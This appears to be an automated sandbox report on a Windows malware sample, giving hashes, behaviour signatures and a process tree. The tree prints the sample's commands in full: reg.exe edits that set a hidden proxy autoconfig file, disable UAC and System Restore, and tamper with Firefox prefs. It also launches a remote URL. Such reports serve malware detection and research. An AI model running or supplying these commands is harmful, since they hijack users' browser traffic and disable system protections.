Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/08/2024, 01:08

General

  • Target
    b9c48000637672f2d7d7d63145067ac8_JaffaCakes118.exe
  • Size
    142KB
  • MD5
    b9c48000637672f2d7d7d63145067ac8
  • SHA1
    a972ea0ee112bc660d24bca053f342bb5729fd5a
  • SHA256
    fbb9385f752eb22943dd8d85e7cf516da201599ac5200f0a48f895fa5b884701
  • SHA512
    08d06a3a75d7a2dca37ad57dd72571e6c0e91bfbc0baac7b56118f39f2da70999d359665514e7b3cc10088965ea6b54e67b9199b62bb2f83cd4ba24a65ceb93d
  • SSDEEP
    3072:aCqJ3dPrq8iYloAAsJlvxeR0TzltP4aQ2yyY:aCu3dPrriYlDAsJlvyQnPJIyY

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9c48000637672f2d7d7d63145067ac8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b9c48000637672f2d7d7d63145067ac8_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Users\Admin\AppData\Local\Temp\windowsfix.exe
      "C:\Users\Admin\AppData\Local\Temp\windowsfix.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24000NUR.bat" "C:\Users\Admin\AppData\Local\Temp\windowsfix.exe" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" "http://afiliados.fastentrega.com/ver.php"
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2492
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2492 CREDAT:275457 /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2404
        • C:\Windows\SysWOW64\attrib.exe
          attrib +H "C:\Users\Admin\AppData\Roaming"\config26313.dat
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1816
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo y"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2176
        • C:\Windows\SysWOW64\cacls.exe
          cacls "C:\Users\Admin\AppData\Roaming"\config26313.dat /P Todos:R
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2688
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:/Users/Admin/AppData/Roaming/config26313.dat" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2392
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1468
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2368
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2156
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2296
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2168
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2304
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:/Users/Admin/AppData/Roaming/config26313.dat" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1692
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1336
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2980
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:896
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1000
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1664
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:860
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          PID:1788
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2364
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3036
          • C:\Windows\SysWOW64\find.exe
            find "prefs.js"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3028
        • C:\Windows\SysWOW64\attrib.exe
          attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js "
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2020
        • C:\Windows\SysWOW64\attrib.exe
          attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js "
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1196
        • C:\Windows\SysWOW64\attrib.exe
          attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js "
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1632

Network

MITRE ATT&CK Enterprise v15

Downloads
